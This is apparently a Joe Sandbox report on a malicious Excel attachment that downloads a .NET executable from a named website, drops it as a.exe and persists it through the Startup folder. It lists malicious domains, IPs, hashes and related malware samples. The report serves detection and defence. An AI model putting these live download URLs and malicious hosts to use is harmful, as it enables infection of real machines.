http://api.ipify	a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://officesetup.getmicrosoftkey.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.carterandcone.coml	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://prod-global-autodetect.acompli.net/autodetect	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://outlook.office365.com/autodiscover/autodiscover.json	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://www.newtonsoft.com/jsonschema	a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://ocsp.sectigo.com0A	a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://weather.service.msn.com/data.aspx	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://apis.live.net/v5.0/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://pastex.pro	a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://management.azure.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.fontbureau.com/designersG	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://incidents.diagnostics.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.fontbureau.com/designers/?	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://github.com/Pester/PesterP	powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/ios	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.fontbureau.com/designers?	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://insertmedia.bing.office.net/odc/insertmedia	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://api.office.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://incidents.diagnosticssdf.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.tiro.com	a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://asgsmsproxyapi.azurewebsites.net/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://www.newtonsoft.com/json	a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.148.121.68	unknown	Netherlands	64425	SKB-ENTERPRISENL	false
54.225.220.115	unknown	United States	14618	AMAZON-AESUS	false
185.199.108.133	unknown	Netherlands	54113	FASTLYUS	false
208.91.199.223	unknown	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
185.162.146.6	unknown	Turkey	60721	BURSABILTR	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356267
Start date:	22.02.2021
Start time:	20:33:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 12s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	LIQUIDACION INTERBANCARIA 02_22_2021.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0.1%) Quality average: 88% Quality standard deviation: 8.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 51.104.139.180, 13.64.90.137, 13.107.5.88, 13.107.42.23, 104.43.139.144, 23.210.249.50, 184.30.21.144, 52.147.198.201, 104.43.193.48, 52.109.32.63, 52.109.12.23, 52.109.76.34, 2.20.142.210, 2.20.142.209, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, prod-w.nexus.live.com.akadns.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, config.edge.skype.com, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, l-0014.l-msedge.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:35:03	API Interceptor	269x Sleep call for process: a.exe modified
20:35:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
20:35:36	API Interceptor	29x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.148.121.68	Vessel Line Up 7105082938.exe	Get hash	malicious	Browse	pastex.pro/b/gmtdfmhFj
45.148.121.68	dwg.exe	Get hash	malicious	Browse	pastex.pro/b/rTfceghKr
54.225.220.115	2e00000.dll	Get hash	malicious	Browse	api.ipify.org/?format=xml
	0112_80556334.doc	Get hash	malicious	Browse	api.ipify.org/
	0112_528419802.doc	Get hash	malicious	Browse	api.ipify.org/
	Our New Order Jan 12 2020 at 2.30_PVV940_PDF.exe	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.Mal.Generic-S.23822.exe	Get hash	malicious	Browse	api.ipify.org/
	nwamamassloga.exe	Get hash	malicious	Browse	api.ipify.org/
	TIRNAK.exe	Get hash	malicious	Browse	api.ipify.org/
	ZfiNFIGegX.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	26-11-20_Dhl_Signed_document-pdf.exe	Get hash	malicious	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
elb097307-934924932.us-east-1.elb.amazonaws.com	nigolas.exe	Get hash	malicious	Browse	50.19.96.218
	RTM DIAS - CTM.exe	Get hash	malicious	Browse	54.235.142.93
	NitroGenerator.exe	Get hash	malicious	Browse	54.225.66.103
	SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls	Get hash	malicious	Browse	23.21.76.253
	SecuriteInfo.com.Heur.11266.xls	Get hash	malicious	Browse	54.235.142.93
	Sign-636.xls	Get hash	malicious	Browse	54.221.253.252
	Sign-709986424_219667767.xls	Get hash	malicious	Browse	54.235.83.248
	Sign-707465831_1420670581.xls	Get hash	malicious	Browse	54.235.83.248
	BANK SWIFT- USD 98,712.00.pdf.exe	Get hash	malicious	Browse	23.21.126.66
	Sign_1136845514-2138034493.xls	Get hash	malicious	Browse	54.221.253.252
	drWcfynA5k.exe	Get hash	malicious	Browse	54.235.83.248
	Purchase Order KVRQ-743012021.doc	Get hash	malicious	Browse	23.21.48.44
	SecuriteInfo.com.Exploit.Siggen3.10048.21085.xls	Get hash	malicious	Browse	23.21.126.66
	SecuriteInfo.com.Exploit.Siggen3.10048.29300.xls	Get hash	malicious	Browse	54.235.83.248
	0217_1737094153981.doc	Get hash	malicious	Browse	54.221.253.252
	DocuSign_167.xls	Get hash	malicious	Browse	23.21.76.253
	SecuriteInfo.com.CAP_HookExKeylogger.18513.exe	Get hash	malicious	Browse	23.21.76.253
	SecuriteInfo.com.Variant.Bulz.361092.7175.exe	Get hash	malicious	Browse	50.19.252.36
	Hs52qascx.dll	Get hash	malicious	Browse	50.19.252.36
	DocuSign_139380140_1184163298.xls	Get hash	malicious	Browse	54.225.220.115
pastex.pro	Vessel Line Up 7105082938.exe	Get hash	malicious	Browse	45.148.121.68
pastex.pro	dwg.exe	Get hash	malicious	Browse	45.148.121.68
us2.smtp.mailhostbox.com	SecuriteInfo.com.Trojan.Packed2.42850.3598.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.Trojan.Inject4.6572.1879.exe	Get hash	malicious	Browse	208.91.199.224
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	208.91.199.225
	ffkjg5CVrO.exe	Get hash	malicious	Browse	208.91.198.143
	7Lf8J7h7os.exe	Get hash	malicious	Browse	208.91.199.223
	Shipping Details_PDF.exe	Get hash	malicious	Browse	208.91.198.143
	YKRAB010B_KHE_Preminary Packing List.xlsx.exe	Get hash	malicious	Browse	208.91.199.225
	RTM DIAS - CTM.exe	Get hash	malicious	Browse	208.91.198.143
	AWB & Shipping Doc.exe	Get hash	malicious	Browse	208.91.199.223
	AWB & Shipping Doc.exe	Get hash	malicious	Browse	208.91.198.143
	PAYMENT INVOICE-9876543456789.exe	Get hash	malicious	Browse	208.91.199.224
	SecuriteInfo.com.Artemis249E62CF9BAE.exe	Get hash	malicious	Browse	208.91.198.143
	inquiry.doc	Get hash	malicious	Browse	208.91.199.224
	SOA.exe	Get hash	malicious	Browse	208.91.199.224
	SecuriteInfo.com.Artemis1A08A3826D57.exe	Get hash	malicious	Browse	208.91.199.225
	BL COPY.exe	Get hash	malicious	Browse	208.91.198.143
	ELASTA-PL-INV-2021024.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.CAP_HookExKeylogger.31203.exe	Get hash	malicious	Browse	208.91.199.224
	SWIFT COPY $27,078.exe	Get hash	malicious	Browse	208.91.199.225
	SWIFT COPY 27078.exe	Get hash	malicious	Browse	208.91.199.224

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	nigolas.exe	Get hash	malicious	Browse	50.19.96.218
	X1(1).xlsm	Get hash	malicious	Browse	34.226.34.190
	X1(1).xlsm	Get hash	malicious	Browse	100.24.200.179
	X1(1).xlsm	Get hash	malicious	Browse	52.200.32.3
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	3.223.115.185
	message_zdm (2).html	Get hash	malicious	Browse	52.44.242.176
	002.docx	Get hash	malicious	Browse	34.192.7.28
	002.docx	Get hash	malicious	Browse	52.20.197.7
	Small Charities.xlsx	Get hash	malicious	Browse	3.229.228.113
	Small Charities.xlsx	Get hash	malicious	Browse	3.209.197.155
	CX2 RFQ.xlsm	Get hash	malicious	Browse	34.226.34.190
	CX2 RFQ.xlsm	Get hash	malicious	Browse	52.200.32.3
	CX2 RFQ.xlsm	Get hash	malicious	Browse	100.24.200.179
	RTM DIAS - CTM.exe	Get hash	malicious	Browse	54.235.142.93
	avast_secure_browser_setup.exe	Get hash	malicious	Browse	54.164.225.86
	AgroAG008021921doc_pdf.exe	Get hash	malicious	Browse	52.0.217.44
	NitroGenerator.exe	Get hash	malicious	Browse	54.225.66.103
	SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls	Get hash	malicious	Browse	23.21.76.253
	SecuriteInfo.com.Heur.11266.xls	Get hash	malicious	Browse	54.235.142.93
	Sign-636.xls	Get hash	malicious	Browse	54.221.253.252
SKB-ENTERPRISENL	Vessel Line Up 7105082938.exe	Get hash	malicious	Browse	45.148.121.68
	dwg.exe	Get hash	malicious	Browse	45.148.121.68
	carirstlite.exe	Get hash	malicious	Browse	45.148.120.153
	LA99293P02.xls	Get hash	malicious	Browse	45.148.121.138
	p1nY2hwmIl.exe	Get hash	malicious	Browse	45.148.120.173
	c4kSaiN1ja.exe	Get hash	malicious	Browse	45.148.120.173
	zKOi8vCorq.exe	Get hash	malicious	Browse	45.148.120.173
	w3QgrgNAWs.exe	Get hash	malicious	Browse	45.148.120.173
	yWWZnMPf9D.exe	Get hash	malicious	Browse	45.148.120.173
	B5qp0eVSkw.exe	Get hash	malicious	Browse	45.148.120.173
	Lz8lkpUFxJ.exe	Get hash	malicious	Browse	45.148.120.142
	mMqGgKfeL6.exe	Get hash	malicious	Browse	45.148.120.142
	IIhgjzqAwH.exe	Get hash	malicious	Browse	45.148.120.142
	MyBNQ4qrLn.exe	Get hash	malicious	Browse	45.148.120.142
	e4vMDSPGNX.exe	Get hash	malicious	Browse	45.148.120.142
	qA655H06I0.exe	Get hash	malicious	Browse	45.148.120.142
	XAwxv0OlTG.exe	Get hash	malicious	Browse	45.148.120.173
	wIKefPv0H6.exe	Get hash	malicious	Browse	45.148.120.142
	C9pzzdQD2W.exe	Get hash	malicious	Browse	45.148.120.142
	n0a5os44N8.exe	Get hash	malicious	Browse	45.148.120.142

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	muOvK6dngg.exe	Get hash	malicious	Browse	185.199.108.133
	SKBM 0222..exe	Get hash	malicious	Browse	185.199.108.133
	Vessel Line Up 7105082938.exe	Get hash	malicious	Browse	185.199.108.133
	ProtonVPN.exe	Get hash	malicious	Browse	185.199.108.133
	PO 86540.exe	Get hash	malicious	Browse	185.199.108.133
	RTM DIAS - CTM.exe	Get hash	malicious	Browse	185.199.108.133
	uTorrent.exe	Get hash	malicious	Browse	185.199.108.133
	hreheh.exe	Get hash	malicious	Browse	185.199.108.133
	JFAaEh5hB6.exe	Get hash	malicious	Browse	185.199.108.133
	Dmjsru7tdt.exe	Get hash	malicious	Browse	185.199.108.133
	Documents_pdf.exe	Get hash	malicious	Browse	185.199.108.133
	BANK SWIFT- USD 98,712.00.pdf.exe	Get hash	malicious	Browse	185.199.108.133
	BMfiIGROO2.exe	Get hash	malicious	Browse	185.199.108.133
	dwg.exe	Get hash	malicious	Browse	185.199.108.133
	Q8XSs7tx9Y.exe	Get hash	malicious	Browse	185.199.108.133
	VYTqKrm2vw.exe	Get hash	malicious	Browse	185.199.108.133
	QzV0wbwrxW.exe	Get hash	malicious	Browse	185.199.108.133
	Inv_874520.exe	Get hash	malicious	Browse	185.199.108.133
	Inv_95736.scr.exe	Get hash	malicious	Browse	185.199.108.133
	drWcfynA5k.exe	Get hash	malicious	Browse	185.199.108.133
37f463bf4616ecd445d4a1937da06e19	GUEROLA INDUSTRIES N#U00ba de cuenta.exe	Get hash	malicious	Browse	185.162.146.6
	receipt145.htm	Get hash	malicious	Browse	185.162.146.6
	xerox for hycite.htm	Get hash	malicious	Browse	185.162.146.6
	SecuriteInfo.com.Heur.15528.xls	Get hash	malicious	Browse	185.162.146.6
	Muligheds.exe	Get hash	malicious	Browse	185.162.146.6
	DHL_6368638172 documento de recibo,pdf.exe	Get hash	malicious	Browse	185.162.146.6
	PDF.exe	Get hash	malicious	Browse	185.162.146.6
	pagamento.exe	Get hash	malicious	Browse	185.162.146.6
	message_zdm (2).html	Get hash	malicious	Browse	185.162.146.6
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	185.162.146.6
	Statement-ID21488878391791.vbs	Get hash	malicious	Browse	185.162.146.6
	frank_2021-02-22_02-03.exe	Get hash	malicious	Browse	185.162.146.6
	Statement-ID72347595684775.vbs	Get hash	malicious	Browse	185.162.146.6
	MR52.vbs	Get hash	malicious	Browse	185.162.146.6
	Scan_medcal equipment sample_pdf.exe	Get hash	malicious	Browse	185.162.146.6
	rfq02212021.exe	Get hash	malicious	Browse	185.162.146.6
	RE ICA 40 Sdn Bhd- Purchase Order#6769704.exe	Get hash	malicious	Browse	185.162.146.6
	RFQ-#09503.exe	Get hash	malicious	Browse	185.162.146.6
	RFQ_1101983736366355 1101938377388.exe	Get hash	malicious	Browse	185.162.146.6
	Offer Request 6100003768.exe	Get hash	malicious	Browse	185.162.146.6

Dropped Files

No context

Created / dropped Files

C:\ProgramData\a.exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	129536
Entropy (8bit):	3.949382785719168
Encrypted:	false
SSDEEP:	768:gHLIU+PDy4GL3Uuwu8uIufFGPIEgB/rCMApfxMwhOJaTSpjfK75rT2C+BHyjdDC/:icZy4GLR/BaDauDvLW7p
MD5:	7D9D8812398EAF9AC0D85E728BBF8637
SHA1:	C87EA3136E5941B9EBA79BB4621CAAFA7B65A462
SHA-256:	F0A487567534A44C564D2658C7A525E828B985DE773A4F513B3F0CDF10C09BDC
SHA-512:	DCC278E46E59913777DA5D49636D77BBAE06C7F9DA24C7DED43075A6F57702A2F1EDF8CEF4C1A767F2E6B529707EF0386685E86A44BFC75128946C27DB13C5E3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 28%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0.................. ... ....@.. .......................`............@.................................e...O.... ..h....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...h.... ......................@..@.reloc.......@......................@..B........................H...........L9..........h...p...........................................~..}.....(.......(.......(.....*.0...........#..........(....r...p(.....s.......{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#........7..#........7..#..........+......,T...#.......@(....Z.[.....(.......{......( ...o!......r'..p..( ...r1..p("...o#.....+..r7..p($...&..8.....{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#.....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	132891
Entropy (8bit):	5.375886783043812
Encrypted:	false
SSDEEP:	1536:FcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:RcQ9DQW+z0XiK
MD5:	0D643781628FC550743656F163B7B2C0
SHA1:	03C6A85CDA29B28F86A475E6A57C31A55E8FD41D
SHA-256:	A5CFE9B472F67D9011F42812EA1D5792B537FD56CD35791CD12BBF05967628C0
SHA-512:	C192C591AD82E0CE03AA9BB4837ADB5D83B7642D98F1399F62C5A6AC338337F92D13A484B4D6CAA26007B723D85AA0AE9463658028D1D8591BB7F9D827E1AE4F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-22T19:34:48">.. Build: 16.0.13817.30529-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	129536
Entropy (8bit):	3.949382785719168
Encrypted:	false
SSDEEP:	768:gHLIU+PDy4GL3Uuwu8uIufFGPIEgB/rCMApfxMwhOJaTSpjfK75rT2C+BHyjdDC/:icZy4GLR/BaDauDvLW7p
MD5:	7D9D8812398EAF9AC0D85E728BBF8637
SHA1:	C87EA3136E5941B9EBA79BB4621CAAFA7B65A462
SHA-256:	F0A487567534A44C564D2658C7A525E828B985DE773A4F513B3F0CDF10C09BDC
SHA-512:	DCC278E46E59913777DA5D49636D77BBAE06C7F9DA24C7DED43075A6F57702A2F1EDF8CEF4C1A767F2E6B529707EF0386685E86A44BFC75128946C27DB13C5E3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 28%
Reputation:	low
IE Cache URL:	https://www.seyranikenger.com.tr/mensajeria_system.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0.................. ... ....@.. .......................`............@.................................e...O.... ..h....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...h.... ......................@..@.reloc.......@......................@..B........................H...........L9..........h...p...........................................~..}.....(.......(.......(.....*.0...........#..........(....r...p(.....s.......{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#........7..#........7..#..........+......,T...#.......@(....Z.[.....(.......{......( ...o!......r'..p..( ...r1..p("...o#.....+..r7..p($...&..8.....{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	17500
Entropy (8bit):	5.5817288422411035
Encrypted:	false
SSDEEP:	384:0t9/Uyi0wPHwy0ykT++SBKn7ulzXo8E7Y9nSJQpJ1G1FYKy:nIyru4K7ulz487RMYd
MD5:	42C524A4728FADB6FF7C310D6ED82279
